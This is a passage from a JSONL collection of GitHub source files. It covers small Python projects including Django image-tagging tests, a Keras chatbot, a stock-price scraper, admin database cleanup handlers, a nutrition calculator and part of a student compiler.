d.keys():\r\n d[i[1]]=1\r\n else:\r\n d[i[1]]+=1\r\nprint(d)\r\n\r\n##output:\r\n##{'Gender': 1, 'Male': 328, 'Female': 192}\r\n","repo_name":"Prakeerthi0538/AIML-Data_set","sub_path":"count_m_f.py","file_name":"count_m_f.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72844195752","text":"# Example 1\n\n# The main() function is defined. This is the entry point of the program.\ndef main():\n \n # The fahr_temps list is initialized with a set of Fahrenheit temperatures.\n fahr_temps = [72, 65, 71, 75, 82, 87, 68]\n\n # The Fahrenheit temperatures are printed using the print() function.\n # Print the Fahrenheit temperatures.\n print(f\"Fahrenheit: {fahr_temps}\")\n\n # Convert each Fahrenheit temperature to Celsius and store\n # the Celsius temperatures in a list named cels_temps.\n # An empty list cels_temps is created to store the Celsius temperatures.\n cels_temps = []\n \n # A for loop is used to iterate over each Fahrenheit temperature in fahr_temps.\n for fahr in fahr_temps:\n \n # Inside the loop, the cels_from_fahr() function is called to convert the Fahrenheit temperature to Celsius.\n cels = cels_from_fahr(fahr)\n \n # The converted Celsius temperature is appended to the cels_temps list using the append() method.\n cels_temps.append(cels)\n\n # Print the Celsius temperatures.\n # After the loop, the Celsius temperatures are printed using the print() function.\n print(f\"Celsius: {cels_temps}\")\n\n\ndef cels_from_fahr(fahr):\n \"\"\"Convert a Fahrenheit temperature to\n Celsius and return the Celsius temperature.\n \"\"\"\n # The cels_from_fahr(fahr) function is defined. It takes a Fahrenheit temperature as an argument and converts it to Celsius using the formula (fahr - 32) * 5 / 9. The result is rounded to one decimal place using the round() function.\n cels = (fahr - 32) * 5 / 9\n return round(cels, 1)\n\n\n# Call main to start this program.\nif __name__ == \"__main__\":\n \n # Finally, the main() function is called to start the program.\n main()\n \n","repo_name":"djhi12/programming_with_functions","sub_path":"week6/example_1.py","file_name":"example_1.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36509868285","text":"from django.test import TestCase, Client\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom rest_framework.test import APITestCase\nfrom .views import NO_TAGS_ERROR_MSG, BAD_FILE_ERROR_MSG, CLOUDINARY_ERROR\n\nimport cloudinary\nfrom PIL import Image\n\nimport cloudinary\n\nimport os\nimport io\n\nTEST_IMAGES_DIR = 'imageprocessor/tagservice/test_images'\n\n\n# Create your tests here.\nclass ViewTests(TestCase):\n def test_view_initialized_successfully(self):\n self.assertTrue(True)\n\n def test_index_view(self):\n client = Client()\n response = client.get(\"/\")\n self.assertTrue(response.status_code == 200)\n\n def test_classify_view(self):\n client = Client()\n response = client.get(\"/classify/\")\n self.assertTrue(response.status_code == 200)\n\n def test_tag_search(self):\n client = Client()\n response = client.get(\"/tagsearch/\")\n self.assertTrue(response.status_code == 200)\n\n def test_tag_search__tagged_pictures(self):\n client = Client()\n response = client.get(\"/tagsearch/tagged_pictures/\")\n self.assertTrue(response.status_code == 200)\n\n def test_register_page(self):\n client = Client()\n response = client.get(reverse('register'))\n self.assertTrue(response.status_code == 200)\n\n def test_not_logged_in_user_cannot_view_my_pictures(self):\n client = Client()\n response = client.get(reverse('view_my_pictures'))\n self.assertTrue(response.status_code == 302)\n\n def test_logged_in_user_can_view_my_pictures(self):\n client = Client()\n client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n client.login(username=\"TestUser1\", password=\"testpassword1\")\n response = client.get(reverse('view_my_pictures'))\n self.assertTrue(response.status_code == 200)\n\n def test_view_my_pictures_picture_count(self):\n client = Client()\n response = client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n client.login(username=\"TestUser1\", password=\"testpassword1\")\n images_to_upload = 5\n for i in range(images_to_upload):\n with open(TEST_IMAGES_DIR + \"/image1.jpg\", \"rb\") as file:\n client.post(reverse('classify'), {'file': file})\n response = client.get(reverse('view_my_pictures'))\n self.assertEqual(len(response.context['my_pictures']) ,images_to_upload)\n for picture in response.context['my_pictures']:\n self.assertTrue('dog' in picture.get_tags().values_list('tag', flat=True))\n\n def test_results_page_shows_image(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image1.jpg\", \"rb\") as file:\n response = client.post(reverse('classify'), {'file': file})\n self.assertIsNotNone(response.context['results'][0]['url'])\n self.assertTrue('dog' in response.context['results'][0]['tags'])\n\n def test_results_page_shows_image_should_error(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image4_should_error.jpg\", \"rb\") as blankImageFile:\n response = client.post(reverse('classify'), {'file': blankImageFile})\n self.assertIsNotNone(response.context['results'][0]['url'])\n self.assertIsNone(response.context['results'][0]['tags'])\n\n def test_results_page_shows_images(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image1.jpg\", \"rb\") as file1, open(TEST_IMAGES_DIR + \"/image4_should_error.jpg\", \"rb\") as file2:\n response = client.post(reverse('classify'), {'file': [file1, file2]})\n self.assertIsNotNone(response.context['results'][0]['url'])\n self.assertIsNotNone(response.context['results'][1]['url'])\n self.assertTrue('dog' in response.context['results'][0]['tags'])\n self.assertTrue(response.context['results'][1]['tags'] == [])\n\n def test_tag_search_post_request_works(self):\n client = Client()\n response = client.post(\"/tagsearch/\", {'tagsearch': ['dog']})\n self.assertTrue(response.status_code == 200)\n self.assertTrue(response.context['search_result'].get(\"total_count\") >= 1)\n\n def test_post_same_image_with_different_name(self):\n client = Client()\n with open(TEST_IMAGES_DIR + \"/image5.jpg\", \"rb\") as file1, open(TEST_IMAGES_DIR + \"/same_as_image5.jpg\", \"rb\") as file2:\n response = client.post(reverse('classify'), {'file': [file1, file2]})\n query = 'resource_type:image AND public_id=' + 'a2324d47504d07607aaae43d7be708c0'\n search_query_result = cloudinary.Search().expression(query).execute()\n print(search_query_result[\"total_count\"])\n self.assertEqual(search_query_result[\"total_count\"], 1)\n\n #this cleans up the test images after the tests in this class are run\n @classmethod\n def tearDownClass(cls):\n delete_test_images()\n\nclass LoginTests(TestCase):\n def test_register_creates_new_user(self):\n original_user_count = User.objects.all().count()\n client = Client()\n response = client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n self.assertEqual(response.status_code,302)\n # checking that the count of users has increase by one from original\n self.assertEqual(original_user_count + 1, User.objects.all().count())\n\n def test_new_user_able_to_login(self):\n client = Client()\n response = client.post(reverse('register'),{'username': \"TestUser1\", 'password1': \"testpassword1\", 'password2': \"testpassword1\"})\n self.assertTrue(client.login(username=\"TestUser1\", password=\"testpassword1\"))\n\nclass ClassifyApiTests(APITestCase):\n\n def test_classify_api_no_image(self):\n response = self.client.post(\"/api/classify/\")\n self.assertEqual(response.status_code, 400)\n\n def test_classify_api_cat_and_dog(self):\n with open(os.path.join(TEST_IMAGES_DIR,\"image3.jpg\"), \"rb\") as file:\n response = self.client.post(\"/api/classify/\", {'file': file}, format='multipart') \n self.assertEqual(response.status_code, 207)\n result = response.data['results'][0]\n self.assertEqual(result['status'], 200)\n self.assertIsNone(result['error_message'])\n self.assertEqual(result['name'], 'image3.jpg')\n self.assertIsNotNone(result['url'])\n self.assertIsNotNone(result['public_id'])\n self.assertIn('cat', result['tags'])\n self.assertIn('dog', result['tags'])\n\n def test_classify_api_muliple_images(self):\n with open(os.path.join(TEST_IMAGES_DIR,\"image3.jpg\"), \"rb\") as file1, open(os.path.join(TEST_IMAGES_DIR,\"image2.jpg\"), \"rb\") as file2:\n response = self.client.post(\"/api/classify/\", {'file': [file1, file2]}, format='multipart')\n self.assertEqual(response.status_code, 207)\n \n result = response.data['results'][0]\n self.assertEqual(result['status'], 200)\n self.assertIsNone(result['error_message'])\n self.assertEqual(result['name'], 'image3.jpg')\n self.assertIsNotNone(result['url'])\n self.assertIsNotNone(result['public_id'])\n self.assertIn('cat', result['tags'])\n self.assertIn('dog', result['tags'])\n\n result = response.data['results'][1]\n self.assertEqual(result['status'], 200)\n self.assertIsNone(result['error_message'])\n self.assertEqual(result['name'], 'image2.jpg')\n self.assertIsNotNone(result['url'])\n self.assertIsNotNone(result['public_id'])\n self.assertIn('kite', result['tags'])\n self.assertIn('person', result['tags'])\n\n def test_classify_api_no_content(self):\n with open(os.path.join(TEST_IMAGES_DIR,\"image4_should_error.jpg\"), \"rb\") as file:\n response = self.client.post(\"/api/classify/\", {'file': file}, format='multipart')\n self.assertEqual(response.status_code, 207)\n result = response.data['results'][0]\n self.assertEqual(result['status'], 204)\n self.assertEqual(result['error_message'], NO_TAGS_ERROR_MSG)\n self.assertEqual(result['name'], 'image4_should_error.jpg')\n self.assertIsNone(result['public_id'])\n self.assertIsNone(result['url'])\n self.assertFalse(result['tags'])\n\n def test_classify_api_unsupported_media(self):\n with io.StringIO(\"This is not a file\") as file:\n response = self.client.post(\"/api/classify/\", {'file': file}, format='multipart')\n self.assertEqual(response.status_code, 207)\n result = response.data['results'][0]\n self.assertEqual(result['status'], 415)\n self.assertEqual(result['error_message'], BAD_FILE_ERROR_MSG)\n self.assertEqual(result['name'], 'file')\n self.assertIsNone(result['public_id'])\n self.assertIsNone(result['url'])\n self.assertFalse(result['tags'])\n\n #this cleans up the test images after the tests in this class are run\n @classmethod\n def tearDownClass(cls):\n delete_test_images()\n\n#helper function\ndef delete_test_images():\n cloudinary.api.delete_resources_by_prefix('TEST_IMAGES/')","repo_name":"PhotoTagger/django-initial","sub_path":"imageprocessor/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26342491250","text":"from abc import ABCMeta, abstractmethod\r\nfrom pyvi import ViTokenizer, ViPosTagger\r\nfrom .texttospeech import texttospeech\r\nimport random\r\nimport json\r\nimport pickle\r\nimport numpy as np\r\nimport os\r\n\r\nfrom pathlib import Path\r\nBASE_DIR = Path(__file__).resolve().parent.parent\r\n#import nltk\r\n#from nltk.stem import WordNetLemmatizer\r\n\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout\r\nfrom tensorflow.keras.optimizers import SGD\r\nfrom tensorflow.keras.models import load_model\r\n\r\nclass IAssistant(metaclass=ABCMeta):\r\n\r\n @abstractmethod\r\n def train_model(self):\r\n \"\"\" Implemented in child class \"\"\"\r\n\r\n @abstractmethod\r\n def request(self, message):\r\n \"\"\" Implemented in child class \"\"\"\r\n\r\nclass GenericAssistant(IAssistant):\r\n def __init__(self, intents, intent_methods={}, model_name=\"assistant_model\"):\r\n self.intents = intents\r\n self.intent_methods = intent_methods\r\n self.model_name = model_name\r\n\r\n if intents.endswith(\".json\"):\r\n self.load_json_intents(intents)\r\n\r\n #self.lemmatizer = WordNetLemmatizer()\r\n\r\n def load_json_intents(self, intents):\r\n with open(intents, 'r', encoding='utf-8') as f:\r\n self.intents = json.loads(f.read())\r\n\r\n def train_model(self):\r\n\r\n self.words = []\r\n self.classes = []\r\n documents = []\r\n ignore_letters = ['!', '?', ',', '.']\r\n\r\n for intent in self.intents['intents']:\r\n for pattern in intent['patterns']:\r\n word = ViTokenizer.tokenize(pattern)\r\n self.words.extend(word)\r\n documents.append((word, intent['tag']))\r\n if intent['tag'] not in self.classes:\r\n self.classes.append(intent['tag'])\r\n\r\n #self.words = [self.lemmatizer.lemmatize(w.lower()) for w in self.words if w not in ignore_letters]\r\n self.words = sorted(list(set(self.words)))\r\n\r\n self.classes = sorted(list(set(self.classes)))\r\n \r\n training = []\r\n output_empty = [0] * len(self.classes)\r\n\r\n for doc in documents:\r\n bag = []\r\n word_patterns = doc[0]\r\n #word_patterns = [self.lemmatizer.lemmatize(word.lower()) for word in word_patterns]\r\n for word in self.words:\r\n bag.append(1) if word in word_patterns else bag.append(0)\r\n\r\n output_row = list(output_empty)\r\n output_row[self.classes.index(doc[1])] = 1\r\n training.append([bag, output_row])\r\n\r\n random.shuffle(training)\r\n training = np.array(training)\r\n\r\n train_x = list(training[:, 0])\r\n train_y = list(training[:, 1])\r\n\r\n self.model = Sequential()\r\n self.model.add(Dense(128, input_shape=(len(train_x[0]),), activation='relu'))\r\n self.model.add(Dropout(0.5))\r\n self.model.add(Dense(64, activation='relu'))\r\n self.model.add(Dropout(0.5))\r\n self.model.add(Dense(len(train_y[0]), activation='softmax'))\r\n\r\n sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n self.model.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n\r\n self.hist = self.model.fit(np.array(train_x), np.array(train_y), epochs=200, batch_size=5, verbose=1)\r\n\r\n def save_model(self, model_name=None):\r\n if model_name is None:\r\n self.model.save(os.path.join(BASE_DIR,f\"{self.model_name}.h5\", self.hist))\r\n pickle.dump(self.words, open(f'{self.model_name}_words.pkl', 'wb'))\r\n pickle.dump(self.classes, open(f'{self.model_name}_classes.pkl', 'wb'))\r\n else:\r\n self.model.save(os.path.join(BASE_DIR,f\"{model_name}.h5\"), self.hist)\r\n pickle.dump(self.words, open(os.path.join(BASE_DIR,f'{model_name}_words.pkl'), 'wb'))\r\n pickle.dump(self.classes, open(os.path.join(BASE_DIR,f'{model_name}_classes.pkl'), 'wb'))\r\n\r\n def load_model(self, model_name=None):\r\n if model_name is None:\r\n self.words = pickle.load(open(os.path.join(BASE_DIR,f'{self.model_name}_words.pkl'), 'rb'))\r\n self.classes = pickle.load(open(os.path.join(BASE_DIR,f'{self.model_name}_classes.pkl'), 'rb'))\r\n self.model = load_model(os.path.join(BASE_DIR,f'{self.model_name}.h5'))\r\n else:\r\n self.words = pickle.load(open(os.path.join(BASE_DIR,f'{model_name}_words.pkl'), 'rb'))\r\n self.classes = pickle.load(open(os.path.join(BASE_DIR,f'{model_name}_classes.pkl'), 'rb'))\r\n self.model = load_model(os.path.join(BASE_DIR,f'{model_name}.h5'))\r\n\r\n def _clean_up_sentence(self, sentence):\r\n sentence_words = ViTokenizer.tokenize(sentence)\r\n #sentence_words = [self.lemmatizer.lemmatize(word.lower()) for word in sentence_words]\r\n return sentence_words\r\n # function _bag_of_words: return an array {0,1} of an user's sentence showing the frequency of these words\r\n def _bag_of_words(self, sentence, words): \r\n sentence_words = self._clean_up_sentence(sentence)\r\n bag = [0] * len(words)\r\n for s in sentence_words:\r\n for i, word in enumerate(words):\r\n if word == s:\r\n bag[i] = 1\r\n return np.array(bag)\r\n\r\n def _predict_class(self, sentence):\r\n p = self._bag_of_words(sentence, self.words)\r\n res = self.model.predict(np.array([p]))[0]\r\n ERROR_THRESHOLD = 0.1\r\n results = [[i, r] for i, r in enumerate(res) if r > ERROR_THRESHOLD]\r\n\r\n results.sort(key=lambda x: x[1], reverse=True)\r\n return_list = []\r\n for r in results:\r\n return_list.append({'intent': self.classes[r[0]], 'probability': str(r[1])})\r\n return return_list\r\n\r\n def _get_response(self, ints, intents_json):\r\n try:\r\n tag = ints[0]['intent']\r\n list_of_intents = intents_json['intents']\r\n for i in list_of_intents:\r\n if i['tag'] == tag:\r\n result = random.choice(i['responses'])\r\n break\r\n except IndexError:\r\n result = \"I don't understand!\"\r\n return result\r\n\r\n def request(self, message):\r\n ints = self._predict_class(message)\r\n print(\"Xuất ints: \", ints, \" và ints[0]['intent']: \" , ints[0]['intent'])\r\n if ints[0]['intent'] in self.intent_methods.keys():\r\n print(\"Đây là:\" ,self.intent_methods.keys())\r\n self.intent_methods[ints[0]['intent']]()\r\n resp = \"Đã thực hiện theo yêu cầu\"\r\n print(\"dừng lại ở đây\")\r\n else:\r\n resp = self._get_response(ints, self.intents)\r\n texttospeech(resp)\r\n print(\"Trợ lí ảo: \" + resp)\r\n return resp","repo_name":"tam2k1/my-repository","sub_path":"home/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38846942978","text":"from bs4 import BeautifulSoup\nfrom urllib import request as req\nimport pandas as pd\n\n# 웹 브라우저 정보 및 웹 스크랩핑할 url\nheaders = (\"user-agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\")\nurl = 'https://finance.naver.com/item/sise_day.naver?code=005930'\n\n# request 라이브러리를 통해 url을 열 때마다 웹 브라우저 정보 제공\nopener = req.build_opener()\nopener.addheaders = [headers]\nresponse = opener.open(url)\n\n# BeautifulSoup 라이브러리로 페이지 파싱 후 해당 사이트의 맨 뒤 페이지 숫자 추출\ndoc = BeautifulSoup(response, 'lxml')\nlast_page = doc.find('td', class_='pgRR').a['href'].split('=')[-1]\n\n# 데이터프레임으로 각 페이지 정보 저장\ndf = pd.DataFrame()\nfor page in range(1, int(last_page) + 1):\n page_url = '{}&page={}'.format(url, page)\n response = opener.open(page_url)\n df = df.append(pd.read_html(response, header=0)[0])\ndf = df.dropna()\n\nprint(df)","repo_name":"minjungw00/Practice_SAIP","sub_path":"Chapter_4/ch04_04.py","file_name":"ch04_04.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26155864518","text":"\nfrom app import db\nfrom app import app\nfrom app.models import Author\nfrom app.models import AuthorChanges\nfrom app.models import Genres\nfrom app.models import GenresChanges\nfrom app.models import Story\nfrom app.models import StoryChanges\nfrom app.models import Tags\nfrom app.models import TagsChanges\n\n\nfrom sqlalchemy import or_\n\nfrom flask import flash\nfrom flask_babel import gettext\nfrom flask_login import current_user\n\nfrom flask_login import current_user\n# import app.series_tools\nfrom app.api_common import getResponse\n\n# import FeedFeeder.FeedFeeder\n\n\n\n\ndef fix_escaped_quotes(dummy_data, admin_override=False):\n\tif admin_override is False and (not current_user.is_mod()):\n\t\treturn getResponse(error=True, message=\"You have to have moderator privileges to do that!\")\n\n\t# SELECT * FROM series WHERE title LIKE E'%\\\\\\'%';\n\tbad_title = 0\n\tbad_desc = 0\n\n\n\tq = Story.query.filter(or_(Story.title.like(r\"%'%\"), Story.title.like(r\"%’%\"), Story.title.like(r\"%‘%\"), Story.title.like(r\"%“%\"), Story.title.like(r\"%”%\")))\n\titems = q.all()\n\tprint(\"Name fixing processing query resulted in %s items\" % len(items))\n\tfor item in items:\n\t\told = item.title\n\t\tnew = old\n\t\twhile any([r\"\\\"\" in new, r\"\\'\" in new, \"’\" in new, \"‘\" in new, \"“\" in new, \"”\" in new]):\n\t\t\tnew = new.replace(r\"\\'\", \"'\")\n\t\t\tnew = new.replace(r'\\\"', '\"')\n\t\t\tnew = new.replace(r\"’\", \"'\")\n\t\t\tnew = new.replace(r\"‘\", \"'\")\n\t\t\tnew = new.replace(r\"“\", '\"')\n\t\t\tnew = new.replace(r\"”\", '\"')\n\n\t\thave = Story.query.filter(Story.title == new).scalar()\n\t\tif old != new:\n\t\t\tif have:\n\t\t\t\tprint(\"Duplicate item!\", (old, new), old==new)\n\t\t\t\tmerge_series_ids(have.id, item.id)\n\t\t\telse:\n\t\t\t\tprint(\"Fixing title.\")\n\t\t\t\titem.title = new\n\t\t\t\tdb.session.commit()\n\t\t\tbad_title += 1\n\n\n\t# FUCK ALL SMART QUOTE BULLSHITS EVER\n\tq = Story.query.filter(or_(Story.description.like(r\"%'%\"), Story.description.like(r\"%’%\"), Story.description.like(r\"%‘%\"), Story.description.like(r\"%“%\"), Story.description.like(r\"%”%\")))\n\n\titems = q.all()\n\tprint(\"Series description processing query resulted in %s items\" % len(items))\n\tfor item in items:\n\t\told = item.description\n\t\tnew = old\n\n\t\twhile any([r\"\\\"\" in new, r\"\\'\" in new, \"’\" in new, \"‘\" in new, \"“\" in new, \"”\" in new]):\n\t\t\tnew = new.replace(r\"\\'\", \"'\")\n\t\t\tnew = new.replace(r'\\\"', '\"')\n\t\t\tnew = new.replace(r\"’\", \"'\")\n\t\t\tnew = new.replace(r\"‘\", \"'\")\n\t\t\tnew = new.replace(r\"“\", '\"')\n\t\t\tnew = new.replace(r\"”\", '\"')\n\t\tif old != new:\n\t\t\tprint(\"Fixing description smart-quotes and over-escapes for series: %s\" % item.id)\n\t\t\titem.description = new\n\t\t\tdb.session.commit()\n\t\t\tbad_desc += 1\n\n\tprint(\"Update complete.\")\n\n\treturn getResponse(\"%s main titles, %s descriptions required fixing. %s\" % (bad_title, bad_desc, conflicts), error=False)\n\n\ndef clean_tags(dummy_data, admin_override=False):\n\tif admin_override is False and (not current_user.is_mod()):\n\t\treturn getResponse(error=True, message=\"You have to have moderator privileges to do that!\")\n\tbad_tags = 0\n\n\tbad_tags = db.session.execute('''\n\t\tSELECT\n\t\t\tCOUNT(*)\n\t\tFROM\n\t\t\ttags\n\t\tWHERE\n\t\t\ttag IN (\n\t\t\tSELECT tag\n\t\t\tFROM (\n\t\t\t\tSELECT tag\n\t\t\t\tFROM tags\n\t\t\t\tGROUP BY tag\n\t\t\t\tHAVING COUNT(*) = 1\n\t\t\t) AS ONLY_ONCE\n\t\t\t)\n\t\t''')\n\n\tbad_tags = list(bad_tags)\n\n\tdb.session.execute('''\n\t\tDELETE\n\t\tFROM\n\t\t\ttags\n\t\tWHERE\n\t\t\ttag IN (\n\t\t\tSELECT tag\n\t\t\tFROM (\n\t\t\t\tSELECT tag\n\t\t\t\tFROM tags\n\t\t\t\tGROUP BY tag\n\t\t\t\tHAVING COUNT(*) = 1\n\t\t\t) AS ONLY_ONCE\n\t\t\t)\n\t\t;\n\t\t''')\n\tdb.session.commit()\n\n\treturn getResponse(\"Found %s tags that required patching.\" % (bad_tags), error=False)\n\ndef deleteStory(data):\n\n\tif not current_user.is_mod():\n\t\treturn getResponse(error=True, message=\"I see what you (tried) to do there!\")\n\tassert 'item-id' in data\n\tassert 'mode' in data\n\n\tdelete_id = data[\"item-id\"]\n\tclean_item = Story.query.filter(Story.id==delete_id).one()\n\n\n\t# !Ordering here matters!\n\t# Change-tables have to go second.\n\tdelete_from = [\n\t\t\tAuthor,\n\t\t\tAuthorChanges,\n\t\t\tTags,\n\t\t\tTagsChanges,\n\t\t\tGenres,\n\t\t\tGenresChanges,\n\t\t\t# Story,\n\t\t\t# StoryChanges,\n\t\t]\n\n\n\tfor clearTable in delete_from:\n\t\tclearTable.query.filter(clearTable.series==clean_item.id).delete()\n\n\tWatches.query.filter(Watches.series_id==clean_item.id).delete()\n\tStory.query.filter(Story.id==clean_item.id).delete()\n\tStoryChanges.query.filter(StoryChanges.srccol==clean_item.id).delete()\n\t# db.session.delete(clean_item)\n\tdb.session.commit()\n\n\treturn getResponse(\"Story was deleted entirely!\", error=False)\n\n","repo_name":"herp-a-derp/tob2","sub_path":"app/api_handlers_admin.py","file_name":"api_handlers_admin.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38674503132","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTally\n\"\"\"\n__author__ = 'Kanru Xie'\n\nimport globalvar as glv\n\n\ndef tally_():\n obj = glv.get_value('objective')\n lat_size = glv.convert_float('lattice size')\n t_card = ''\n max_lat = int(40 / lat_size - 2)\n center_lat = int(max_lat / 2)\n if obj == 'x':\n t_card = str('*F8:p (3<3[0:' + str(max_lat) + ' 0:0 0:0])')\n elif obj == 'y':\n t_card = str('*F8:p (3<3[0:0 0:' + str(max_lat) + ' 0:0])')\n elif obj == 'z':\n t_card = str('*F8:p (3<3[0:0 0:0 0:' + str(int(40 / lat_size - 1)) + '])')\n elif obj == 'xy':\n t_card = str('*F8:p (3<3[0:' + str(max_lat) + ' ' +\n str(center_lat) + ':' + str(center_lat) + ' 0:0])' + '\\n' +\n '*F18:p (3<3[' + str(center_lat) + ':' + str(center_lat) +\n ' 0:' + str(max_lat) + ' 0:0])'\n )\n elif obj == 'detector':\n t_card = str('*F8:p 2')\n return t_card\n","repo_name":"UToledoVLinac/Virtual_Linac","sub_path":"main/input_file_creator/write_material_card/tally.py","file_name":"tally.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73943534954","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 15th August 2016\n@author: Daniel Durrenberger\n'''\ndef LBM(sex, mass, size):\n '''\n Lean Body Mass on Wikipedia\n sex = 0 for women, 1 for men\n mass in kg\n size in m\n '''\n if sex==0:\n lbm = (0.29569*mass)+(41.813*size)-43.2933\n else:\n lbm = (0.32810*mass)+(33.929*size)-29.5336\n return lbm\n\ndef TBM(sex, mass, size):\n '''\n Typical Body Mass\n http://www.hussmanfitness.org/bmrcalc.htm\n '''\n lbm = LBM(sex, mass, size)\n if sex==0:\n factor = 1.20\n else:\n factor = 1.15\n return factor * lbm\n\ndef BMR(sex, mass, size, age):\n '''\n Metabolisme de base\n Base Metabolic Rate\n sex = 0 for women, 1 for men\n mass in kg\n size in m\n age in years\n BMR in kcal/d (1000 kcal = 4,186 Mj)\n Black and al. (1996) formula\n '''\n if age>18:\n if sex==0:\n BMR = 230 * mass**(0.48) * size**(0.50) * age**(-0.13)\n else:\n BMR = 259 * mass**(0.48) * size**(0.50) * age**(-0.13)\n elif age<1:\n BMR = 92 * mass\n return BMR\n\ndef activityFactor(sex, activityLevel=3, weeklySports=0):\n '''\n sex = 0 for women, 1 for men\n activityLevel is\n 1 - resting\n 2 - mainly sitting\n 3 - sitting + few calm activities\n 4 - standing work\n 5 - sport\n weeklySports is how many times a week you practice\n '''\n woman = [1.2, 1.4, 1.6, 1.8, 2.2]\n man = [1.3, 1.5, 1.7, 1.9, 2.4]\n if sex==0:\n factor = woman[activityLevel] + 0.3*weeklySports\n else:\n factor = man[activityLevel] + 0.3*weeklySports\n return factor\n\ndef BMI(mass, size):\n '''\n Body Mass Index\n '''\n return mass / size**2\n\ndef bmiFactor(bmi):\n '''\n il faut diminuer la DEJ calculee de 1 pour cent par point d'IMC\n en-dessus de 22 et l'augmenter systematiquement en-dessous de 22\n '''\n return 1 + (22-bmi)/100.\n\ndef DEE(sex, mass, size, age, activityLevel=3, weeklySports=0):\n '''\n calculates Daily Energy Expenditure in kcal\n sex = 0 for women, 1 for men\n activityLevel is\n 1 - resting\n 2 - mainly sitting\n 3 - sitting + few calm activities\n 4 - standing work\n 5 - sport\n weeklySports is how many times a week you practice\n '''\n bmr = calculateBMR(sex, mass, size, age)\n actFactor = activityFactor(sex, activityLevel, weeklySports)\n bmi = calculateBMI(mass, size)\n bmiFactor = bmiFactor(bmi)\n return bmr * actFactor * bmiFactor\n\ndef protein(mass, sex=1, age=30, pregnant=False, breastfeeding=False):\n '''\n calculates the appropriate amount of protein one needs daily in grams\n ANC = 0.83g/kg/j\n '''\n prot = 0.83*mass\n if age>70 or sex==1:\n prot = 1.*mass\n if pregnant:\n prot += 0.1*mass\n if breastfeeding:\n prot += 0.3*mass\n return prot\n","repo_name":"fabio-dev/behealth","sub_path":"nutrition/nutrition.py","file_name":"nutrition.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25416496410","text":"#######################################################################\n# CSC 365 Project Group 2\n# Jacob Duncan, Jakob Robinson, Terry Townsend, Brad Kivett\n#\n# Extension to the compiler to handle actual translation\n#\n#######################################################################\nfrom __future__ import annotations\nfrom PLine import PLine\nimport helpers.compiler_functions as cf\n\nregisters: dict[str, int] = {\"EDX\": 0, \"ECX\": 0, \"EBX\": 0, \"EAX\": 0}\nflags: dict[str, bool] = {\"OF\": False, \"SF\": False, \"CF\": False, \"ZF\": False}\nvariables: dict[str, int] = {}\n\n####################################\n# Variable Declaration\n# Brad K\n####################################\ndef declaration(pline_instance: PLine) -> int: # start by checking if signed or unsigned\n line_text: str = pline_instance.text # grab text from line instance\n vars: list[str] = line_text.split() # split words in str into list. Im not sure if there's going to be HLC with less than 3 variables\n del vars[0] # delete signed/unsigned word from variables list. EX:del vars[0]=\"signed\" --> vars[0]=\"a\" \n \n for v in vars: # for variables being declared in vars\n dec_count = len(variables) + 1 # set declaration count to length of variables (0) + 1 = 1\n variables[v] = 1024 - dec_count # set variables[v] equal to length of memory - declaration count\n print(\"Declaration line processed\") \n return 0 # counter shouldn't go up yet, return 0\n\n##########################\n# Arithmetic operations and Assignments\n# Jacob Duncan\n##########################\ndef arithmetic(pline_instance: PLine) -> int: # assignment portion of flowchart\n line_text: str = pline_instance.text # grab text from line\n vars: list[str] = line_text.split() # split variables in line into list.\n counter: int = 0\n temp_ymc: str\n isSigned: bool\n signed: list[str] = [\"x\", \"y\", \"z\"]\n assignment: str = vars[0] # get variable we are assigning a value to\n del vars[0] # delete the variable being assiged cause its stored \n del vars[0] # delete the = sign\n\n if assignment in signed:\n isSigned = True\n else:\n isSigned = False\n\n # Handle assignments here\n if len(vars) == 1: # this means that this is just an assingment operation with no arithmetic\n if any(char.isdigit() for char in vars[0]): # literal\n temp_ymc = \"movrl eax, \" + vars[0] + \"\\n\" \n counter += 3 # movrl is 3 bytes, so we increment the program_counter by 3\n else:\n address: str = str(variables[vars[0]])\n temp_ymc = \"movrm eax, \" + address + \"\\n\"\n counter += 4 # movrm is 4 bytes, so we increment the program_counter by 4\n \n temp_ymc += \"movmr \" + str(variables[assignment]) + \", eax\\n\"\n counter += 4 # movmr is 4 bytes, so we increment the program_counter by 4\n\n # Set modified registers and ymc\n pline_instance.set_register(\"EAX\")\n pline_instance.set_YMC(temp_ymc)\n\n # Handle 2-arg arithmetic\n elif len(vars) == 3: 